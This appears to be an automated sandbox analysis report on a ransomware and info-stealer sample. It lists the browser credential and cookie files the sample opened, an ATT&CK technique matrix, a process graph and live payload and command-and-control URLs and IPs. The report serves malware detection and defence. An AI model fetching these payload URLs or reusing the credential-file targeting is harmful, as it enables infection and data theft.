        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\search.json.mozlz4Jump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addonStartup.json.lz4Jump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\trusted_vault.pbJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\AlternateServices.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shmJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqliteJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\extension-preferences.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqliteJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite-shmJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite-shmJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\times.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqliteJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite-walJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite-walJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ExperimentStoreData.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journalJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\xulstore.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqliteJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\yiaxs5ej.default\times.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\containers.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\handlers.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\parent.lockJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore.jsonlz4Jump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqliteJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\pkcs11.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.icoJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addons.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\shield-preference-experiments.jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-walJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\SiteSecurityServiceState.txtJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\targeting.snapshot.jsonJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Native API
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Deobfuscate/Decode Files or Information
        1
        OS Credential Dumping
        2
        System Time Discovery
        1
        Taint Shared Content
        11
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium2
        Data Encrypted for Impact
        CredentialsDomainsDefault Accounts3
        Command and Scripting Interpreter
        1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        2
        Obfuscated Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop Protocol1
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Services File Permissions Weakness
        211
        Process Injection
        1
        Software Packing
        Security Account Manager2
        File and Directory Discovery
        SMB/Windows Admin Shares1
        Screen Capture
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        NTDS24
        System Information Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
        Services File Permissions Weakness
        1
        Masquerading
        LSA Secrets1
        Query Registry
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
        Virtualization/Sandbox Evasion
        Cached Domain Credentials141
        Security Software Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
        Process Injection
        DCSync21
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Services File Permissions Weakness
        Proc Filesystem2
        Process Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        System Network Configuration Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1492473 Sample: C0XWmZAnYk.exe Startdate: 13/08/2024 Architecture: WINDOWS Score: 100 52 znpst.top 2->52 54 securebiz.org 2->54 56 api.2ip.ua 2->56 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 9 other signatures 2->66 9 C0XWmZAnYk.exe 2->9         started        12 C0XWmZAnYk.exe 2->12         started        14 C0XWmZAnYk.exe 2->14         started        16 C0XWmZAnYk.exe 2->16         started        signatures3 process4 signatures5 74 Detected unpacking (overwrites its own PE header) 9->74 76 Writes a notice file (html or txt) to demand a ransom 9->76 78 Contains functionality to inject code into remote processes 9->78 80 Writes many files with high entropy 9->80 18 C0XWmZAnYk.exe 1 17 9->18         started        82 Multi AV Scanner detection for dropped file 12->82 84 Injects a PE file into a foreign processes 12->84 22 C0XWmZAnYk.exe 13 12->22         started        24 C0XWmZAnYk.exe 14->24         started        26 C0XWmZAnYk.exe 16->26         started        process6 dnsIp7 58 api.2ip.ua 188.114.96.3, 443, 49704, 49705 CLOUDFLARENETUS European Union 18->58 46 C:\Users\user\AppData\...\C0XWmZAnYk.exe, PE32 18->46 dropped 48 C:\Users\...\C0XWmZAnYk.exe:Zone.Identifier, ASCII 18->48 dropped 28 C0XWmZAnYk.exe 18->28         started        31 icacls.exe 18->31         started        file8 process9 signatures10 86 Injects a PE file into a foreign processes 28->86 33 C0XWmZAnYk.exe 1 20 28->33         started        process11 dnsIp12 50 znpst.top 92.246.89.93, 49706, 80 LIVECOMM-ASRespublikanskayastr3k6RU Russian Federation 33->50 38 C:\_readme.txt, ASCII 33->38 dropped 40 C:\Users\...\DefaultLayouts.xml.rigd (copy), data 33->40 dropped 42 ExplorerStartupLog...nce.etl.rigd (copy), data 33->42 dropped 44 104 other malicious files 33->44 dropped 68 Tries to harvest and steal browser information (history, passwords, etc) 33->68 70 Infects executable files (exe, dll, sys, html) 33->70 72 Modifies existing user documents (likely ransomware behavior) 33->72 file13 signatures14

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        C0XWmZAnYk.exe87%ReversingLabsWin32.Trojan.Tnega
        C0XWmZAnYk.exe100%AviraHEUR/AGEN.1316578
        C0XWmZAnYk.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe87%ReversingLabsWin32.Trojan.Tnega
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.nytimes.com/0%URL Reputationsafe
        http://www.amazon.com/0%URL Reputationsafe
        http://www.twitter.com/0%URL Reputationsafe
        http://www.openssl.org/support/faq.html0%URL Reputationsafe
        http://www.youtube.com/0%URL Reputationsafe
        http://www.wikipedia.com/0%URL Reputationsafe
        http://www.reddit.com/0%URL Reputationsafe
        http://znpst.top/dl/build2.exe:100%Avira URL Cloudmalware
        https://api.2ip.ua/geo.json-0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonl0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json)VZY$0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonm0%Avira URL Cloudsafe
        http://znpst.top/dl/build2.exe100%Avira URL Cloudphishing
        https://api.2ip.ua/geo.jsoni0%Avira URL Cloudsafe
        http://securebiz.org/fhsgtsspen6/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true0%Avira URL Cloudsafe
        https://api.2ip.ua/0%Avira URL Cloudsafe
        http://securebiz.org/fhsgtsspen6/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true(y0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsont_0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json0%Avira URL Cloudsafe
        http://securebiz.org/fhsgtsspen6/get.phpCoder0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json~0%Avira URL Cloudsafe
        http://securebiz.org/fhsgtsspen6/get.php?pid=903E7F261711F85395E5CEFBF4173C540%Avira URL Cloudsafe
        http://securebiz.org/files/1/build3.exe$run0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json=0%Avira URL Cloudsafe
        http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsony0%Avira URL Cloudsafe
        http://securebiz.org/files/1/build3.exe$run10.08.20190%Avira URL Cloudsafe
        https://we.tl/t-2zbBkO06mv0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsons0%Avira URL Cloudsafe
        http://znpst.top/dl/build2.exe$run100%Avira URL Cloudmalware
        http://securebiz.org/files/1/build3.exer0%Avira URL Cloudsafe
        https://we.tl/t-2zbBkO060%Avira URL Cloudsafe
        https://we.tl/t-2zbBkO06X0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonz0%Avira URL Cloudsafe
        http://securebiz.org/fhsgtsspen6/get.php0%Avira URL Cloudsafe
        http://www.live.com/0%Avira URL Cloudsafe
        http://securebiz.org/files/1/build3.exe0%Avira URL Cloudsafe
        http://www.google.com/0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonA0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonp20%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        api.2ip.ua
        188.114.96.3
        truefalse
          unknown
          znpst.top
          92.246.89.93
          truetrue
            unknown
            securebiz.org
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://api.2ip.ua/geo.jsonfalse
              • Avira URL Cloud: safe
              unknown
              http://securebiz.org/fhsgtsspen6/get.phptrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://securebiz.org/fhsgtsspen6/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true(yC0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.nytimes.com/C0XWmZAnYk.exe, 00000006.00000003.2317448313.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://znpst.top/dl/build2.exeC0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: phishing
              unknown
              https://api.2ip.ua/C0XWmZAnYk.exe, 00000009.00000002.2202422051.0000000000638000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000003.2276097000.0000000000759000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276934324.000000000075B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.json)VZY$C0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.json-C0XWmZAnYk.exe, 00000002.00000002.2063725097.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683012992.00000000008C8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonmC0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000919000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://znpst.top/dl/build2.exe:C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000919000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://api.2ip.ua/geo.jsonlC0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.amazon.com/C0XWmZAnYk.exe, 00000006.00000003.2316998230.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.2ip.ua/geo.jsoniC0XWmZAnYk.exe, 0000000C.00000003.2276097000.0000000000759000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276934324.000000000075B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://securebiz.org/fhsgtsspen6/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=trueC0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsont_C0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://securebiz.org/fhsgtsspen6/get.php?pid=903E7F261711F85395E5CEFBF4173C54C0XWmZAnYk.exe, 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://securebiz.org/files/1/build3.exe$runC0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000919000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.twitter.com/C0XWmZAnYk.exe, 00000006.00000003.2317614991.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.openssl.org/support/faq.htmlC0XWmZAnYk.exe, 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://securebiz.org/fhsgtsspen6/get.phpCoderC0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007E6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.json=C0XWmZAnYk.exe, 00000006.00000002.2683012992.00000000008C8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorC0XWmZAnYk.exe, 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.json~C0XWmZAnYk.exe, 00000009.00000002.2202422051.0000000000682000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonyC0XWmZAnYk.exe, 0000000C.00000003.2276097000.0000000000759000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 0000000C.00000002.2276934324.000000000075B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://securebiz.org/files/1/build3.exe$run10.08.2019C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000919000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007D0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://we.tl/t-2zbBkO06mvC0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000098B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.000000000098B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000961000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://securebiz.org/files/1/build3.exerC0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://znpst.top/dl/build2.exe$runC0XWmZAnYk.exe, 00000006.00000002.2683136058.000000000091A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://api.2ip.ua/geo.jsonzC0XWmZAnYk.exe, 00000009.00000002.2202422051.00000000005F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.youtube.com/C0XWmZAnYk.exe, 00000006.00000003.2317750484.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://we.tl/t-2zbBkO06C0XWmZAnYk.exe, 00000006.00000002.2684111826.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007E6000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonsC0XWmZAnYk.exe, 00000009.00000002.2202422051.00000000005F8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.wikipedia.com/C0XWmZAnYk.exe, 00000006.00000003.2317686785.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://we.tl/t-2zbBkO06XC0XWmZAnYk.exe, 00000007.00000002.3281459864.00000000007E6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.live.com/C0XWmZAnYk.exe, 00000006.00000003.2317364588.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://securebiz.org/files/1/build3.exeC0XWmZAnYk.exe, 00000006.00000003.2682082252.0000000000954000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000002.2683136058.0000000000954000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://www.reddit.com/C0XWmZAnYk.exe, 00000006.00000003.2317528873.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.2ip.ua/geo.jsonAC0XWmZAnYk.exe, 00000007.00000002.3281459864.0000000000738000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.google.com/C0XWmZAnYk.exe, 00000006.00000003.2317259186.00000000031B0000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
